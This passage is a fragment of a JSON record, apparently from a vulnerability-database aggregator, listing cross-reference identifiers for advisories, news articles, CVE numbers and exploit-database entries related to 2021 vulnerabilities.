"THREATPOST:1C5C89106D8897D6CDDFF572948A779A", "THREATPOST:1D743B7D5397A9D33A091396D1D95BDB", "THREATPOST:1E11FA7540C2CE7C48832A342FAAB3A8", "THREATPOST:1F7B99C76055BD44C266432644E6B9CB", "THREATPOST:1FA77776DEE21633617B7B927000ADBF", "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "THREATPOST:1FDD4D6EFB350CC9F6F42A5514AA6849", "THREATPOST:20A9D9F111F89A61A6242B788FCF6209", "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "THREATPOST:21439BDD06D57894E0142A06D59463B5", "THREATPOST:215398BCE165265631436077B4E79ECB", "THREATPOST:222B126A673B8B22370D386B699A7F90", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:247A5639B207C2C522F735B0C3412087", "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "THREATPOST:25717276FF4A4B28101C95CA25FAAC85", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:270516BE92D218A333101B23448C3ED3", "THREATPOST:27F2EB604A7262CA0448D6463BA3B2A4", "THREATPOST:27F8092D2D7E88CBD23EAF8A7A016E24", "THREATPOST:28D790372A5C9EB1083AA78A4FDF3C0E", "THREATPOST:28E43852D5120A3EC8F4720244E0C432", "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "THREATPOST:2AFE9BC25DD41D9CF073C8C04B0B1879", "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "THREATPOST:2D616CF8D8ED2AEB6805F098560269CB", "THREATPOST:2DAD0426512A1257D3D75569F282640E", "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "THREATPOST:30F4296B03191B6F9433E5DFA9CEBFE6", "THREATPOST:326CCB6EA4E28611AD98B1964CFEE88E", "THREATPOST:3283173A16F1E86892491D89F2E307C2", "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "THREATPOST:34CC110D7F26B1B4D3B97BE05F000B69", "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "THREATPOST:379EB96BF0EAF29DD5D3B3140DEF25F5", "THREATPOST:384A1D8040B61120BE2BA529493B9871", "THREATPOST:392CE26C2E3587A54C58FBEC0E26729F", "THREATPOST:3973FA851D33322A013EA1314A1AACC7", "THREATPOST:398E85215A3E7B7329EE3FED8F6374FF", "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "THREATPOST:3B27D34858D1F6DE1183C9ABEE8643CD", "THREATPOST:3BA8475F97E24074B27812B9B24AD05F", "THREATPOST:3BDDDA913AECAA168F2B8059EF6BF25A", "THREATPOST:3D0B017E262134B8D61E195735411E8A", "THREATPOST:3D30F37EC2CC17D6C3D6882CF7F9777E", "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "THREATPOST:415E19FC1402E6223871B55143D39C98", "THREATPOST:42533F5A68FABB4F312743C2E2A1262A", "THREATPOST:426AA248C0C594BAA81FC6B16FD74B7F", "THREATPOST:42FDB1238D348C4F4A1074DB3091E6F2", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:43C7C5989C2358091F5FA33D11480AEB", "THREATPOST:43EF6CEDCAE06DF2760527AA36C42994", "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "THREATPOST:44C93D75841336281571380C5E523A23", "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:4622EF32C9940819EDA248FBC9C1F722", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:49045E816279C72FD35E91BF5F87387C", "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "THREATPOST:49E24C3D272F18F81C1E207E97168C33", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:4AB3E2B46281B3DB5FFB51D8F16A11EC", "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "THREATPOST:4C1556375D297ECC5389073B3ECC185E", "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "THREATPOST:4DF584EB3FA47CA6245D964EA2A1A2FB", "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "THREATPOST:4F6F13C74BC6E5EC3C5FF0600F339C90", "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "THREATPOST:542C0B0D14A54FEF96D5035E5ABEFEDF", "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "THREATPOST:5679ACC257BEC35A3A300F76FA78E8E6", "THREATPOST:580280FBECF50DF8FF68F3A998F311D3", "THREATPOST:59732F848538CA26FD0A3AC638F529F9", "THREATPOST:59C4483705849ADA19D341EFA462DD19", "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "THREATPOST:5BA927C1BD88B4949BDAEC1ACC841488", "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "THREATPOST:5DA1737F4321D42086053820C84CCFB0", "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "THREATPOST:61F350907297E5B2EBAE56FF04C054C7", "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "THREATPOST:62A15BEBBD95FBF8704B78058BF030F1", "THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:64EE7E2569B19CDBC1F2000D27D9FC06", "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "THREATPOST:6968030EBEDCF665121F267E466D3BA5", "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "THREATPOST:6B8C9E983349C1AA69D5488866DAAC1D", "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "THREATPOST:6E46A05627B4B870228F4C53DD7811AE", "THREATPOST:6EBEA4CC58A28C7B7DEE65B4D6FDA976", "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "THREATPOST:71D015FE251ED550B92792FF72430841", "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "THREATPOST:752864660896CF677AF67798E68952F0", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7642BB12A1C6458D5DDB7202B6BF1D62", "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "THREATPOST:78B8BC1F232A077BA4B03580A37C0780", "THREATPOST:78CC95FFED89068ABD2CBA57EFE1D5F8", "THREATPOST:7957677E374E9980D5154F756D4A2E00", "THREATPOST:7A640DBB2223135AD8DC65457AB55EBF", "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "THREATPOST:7BE818C547990FA7A643DE9C0DE99C8C", "THREATPOST:7D0B88F224FD59AB5C49F030B02A25D9", "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "THREATPOST:7D43FDAB0FB38B20FBB86FFF6FD31270", "THREATPOST:7E30033E60118E5B4B8C14689A890155", "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "THREATPOST:7F4C76F7EC1CB91B3A37DE64274F1EC3", "THREATPOST:7F86D903184A4B5AF689693F5950FB7D", "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "THREATPOST:80978215EBC2D47937D2F3471707A073", "THREATPOST:809BED35A98A53099CE1EC723FA950F2", "THREATPOST:80D12F3888B999E484D206D5EBA9EEA0", "THREATPOST:828471E05035E11C0ED67C67E1EA8F0D", "THREATPOST:836083DB3E61D979644AE68257229776", "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "THREATPOST:8836AC81C1F2D9654424EC1584E50A16", "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "THREATPOST:88DD5812D3C8652E304F32507E4F68DD", "THREATPOST:8A24910206DA1810DAD81ABA313E33A7", "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA", "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "THREATPOST:8F39618B0CB625A1C4FC439D0A7C4EB9", "THREATPOST:8FAA8C7C7378C070F0011A0B44C03726", "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "THREATPOST:90355E85731E1618F6C63A58CD426966", "THREATPOST:9347B4A695C8250B35A5455A788D2D99", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:945830C59DF62627CC3D29C4F9E9139F", "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "THREATPOST:95C6723464FA4BDF541640AC24DD5E35", "THREATPOST:9673D04DAD513AC05EA6440633D75339", "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "THREATPOST:96B85F971B8102B581B91984548004F2", "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", "THREATPOST:9758835CBD1761636E1E39F36A79936B", "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "THREATPOST:985009AC9680D632153D78707A8949EF", "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "THREATPOST:9DAD31CF008CF12C5C4A4EA19C77BB66", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:9FE968913EDA58B2C622DFD4433C05E0", "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:A824AE46654142C5CE71C8DDFD90D548", "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "THREATPOST:AE4AEC18802953FE366542717C056064", "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "THREATPOST:B7280795B2A42655BE9618D06EB9520A", "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "THREATPOST:B79D0A844D2D8BF7A75F2D397398D75A", "THREATPOST:B7E1238E416DAB5F50EED6E4CC347296", "THREATPOST:B879E243998561911585BBD37B7F33E9", "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BADA213290027D414693E838771F8645", "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "THREATPOST:C23B7DE85B27B6A8707D0016592B87A3", "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:CF9E25BD324C5940B0795721CA134155", "THREATPOST:D053D0BAA76AC62C5AFCB77CBFD61B6D", "THREATPOST:D11D4E32822220251B14068F9BAAD17E", "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "THREATPOST:D58796CB8261B361ADF389131F955AE3", "THREATPOST:D5CE687F92766745C002851DFA8945DE", "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "THREATPOST:D8172FCB461F5843B3391B2336A4D02F", "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "THREATPOST:E067CFBFA163616683563A8ED34648FE", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "THREATPOST:E46805A1822D16B4725517D4B8786F57", "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "THREATPOST:E539817E8025A93279C63158F37F2DFB", "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "THREATPOST:E7C5C8276111C637456F053327590E4C", "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6", "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:F006B56821C572012C6CBF003C78C596", "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "THREATPOST:F261FA3F1DECA361A6DBC169065B1101", "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F514D796FE42C0629BD951D8664A2420", "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "THREATPOST:F701F7503777655BB413FCBEFB88C8DE", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:FBDE9552D48B698542D65DEA64890566", "THREATPOST:FBF1F4B1FB26C8B1E95965E920F985EF", "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FF67AF009F2F0031599099334F6CC306", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883", "THREATPOST:FFC3DB875D4337781CF78C0D4B39F0E0"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034", "TRENDMICROBLOG:B5EA1F5E613C3A15D832147CF064EC78", "TRENDMICROBLOG:C9F6DD38959C2193331C83CA846C0A71"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-21139", "UB:CVE-2021-21148", "UB:CVE-2021-21166"]}, {"type": "veracode", "idList": ["VERACODE:29110", "VERACODE:29323", "VERACODE:29632"]}, {"type": "vmware", "idList": ["VMSA-2021-0002"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0", "WALLARMLAB:C5940EBF622709A929825B8B12592EF5"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119", "1337DAY-ID-35863", "1337DAY-ID-35879", "1337DAY-ID-35912", "1337DAY-ID-35944", "1337DAY-ID-36024", "1337DAY-ID-36262", "1337DAY-ID-36281", "1337DAY-ID-36472", "1337DAY-ID-37433"]}]}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "adobe", "idList": ["APSB21-09"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070"]}, {"type": "archlinux", "idList": ["ASA-202102-4", "ASA-202103-19"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65", "AKB:06000FAE-591B-46C7-8573-3D63BDDD0D13", "AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "AKB:4BB453DC-4A7E-4FAF-832B-C5079208A3DA", "AKB:4C137002-9580-4593-83DB-D4E636E1AEFB", "AKB:5ACC27EC-B7F2-405F-B3D6-009D27A1C386", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "AKB:925F84D3-4FE0-4A18-BAA9-170C701E718D", "AKB:9B59AD71-CB71-4C61-A639-5DC0E582DDC2", "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "AKB:A85EDE41-3F67-480B-8858-46B5D866EB51", "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1", "AKB:DFA2540D-E431-4CDE-B67A-7EA3F2B87A74", "AKB:DFA61FBF-688B-44E9-8B09-134E93207AD9"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A"]}, {"type": "canvas", "idList": ["ETERNALBLUE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712", "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1009", "CPAI-2018-0018", "CPAI-2021-0001", "CPAI-2021-0032", "CPAI-2021-0066", "CPAI-2021-0099", "CPAI-2021-0106", "CPAI-2021-0107", "CPAI-2021-0108", "CPAI-2021-0482"]}, {"type": "chrome", "idList": ["GCSA-2763659147289736801", "GCSA-3803715665928870837", "GCSA-8963246051762193641"]}, {"type": "cisa", "idList": ["CISA:16DE226AFC5A22020B20927D63742D98", "CISA:911DE59572B6EF78B42DD868D622F637", "CISA:CB32DB4C2EA92462F387E1DA6C08F57E", "CISA:F7C7CFE30EB8A6B7C1DCDEA50F649F74"]}, {"type": "cve", "idList": ["CVE-2015-2523", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-1647", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21139", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21972", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24092", "CVE-2021-24094", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4846-1:CCE83", "DEBIAN:DSA-4858-1:7131E", "DEBIAN:DSA-4886-1:0EF07"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-21139", "DEBIANCVE:CVE-2021-21148", "DEBIANCVE:CVE-2021-21166"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163", "EDB-ID:49602"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB"]}, {"type": "fedora", "idList": ["FEDORA:4E16930B130B", "FEDORA:87F5C30A253B", "FEDORA:A017F3074280", "FEDORA:BB03930B3A56", "FEDORA:BF4FC30A0346", "FEDORA:C67773052A4D", "FEDORA:E0A463072F31"]}, {"type": "fireeye", "idList": ["FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:C650A7016EEAD895903FB350719E53E3"]}, {"type": "freebsd", "idList": ["4ED0E43C-5CEF-11EB-BAFD-3065EC8FD3EC", "F00B65D8-7CCB-11EB-B3BE-E09467587C17"]}, {"type": "gentoo", "idList": ["GLSA-202101-13"]}, {"type": "githubexploit", "idList": ["F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E"]}, {"type": "hackerone", "idList": ["H1:1119224", "H1:1119228"]}, {"type": "hivepro", "idList": ["HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B"]}, {"type": "kaspersky", "idList": ["KLA11139", "KLA11170", "KLA12044", "KLA12048", "KLA12049", "KLA12062", "KLA12063", "KLA12071", "KLA12072", "KLA12075", "KLA12103", "KLA12106", "KLA12107", "KLA12108", "KLA12112", "KLA12178", "KLA12179"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:4F19DF7091060B198B092ABE2F7E1AA8", "KREBS:65D25A653F7348C7F18FFD951447B275", "KREBS:83CB7FE17AB0EB62BC1947A917C7546C", "KREBS:B3F20C0C41C613971FDADBAE93382CDF"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:07CCE98B638067D2F0F9AD53E87E8D55", "MALWAREBYTES:232C556149FB9AC828C416ADCCF93766", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:3C358DDA439A247A9677866AFE8FA961", "MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B", "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "MALWAREBYTES:C38FDAA2A9E5E349305313C6D17A0D3A"]}, {"type": "metasploit", "idList": 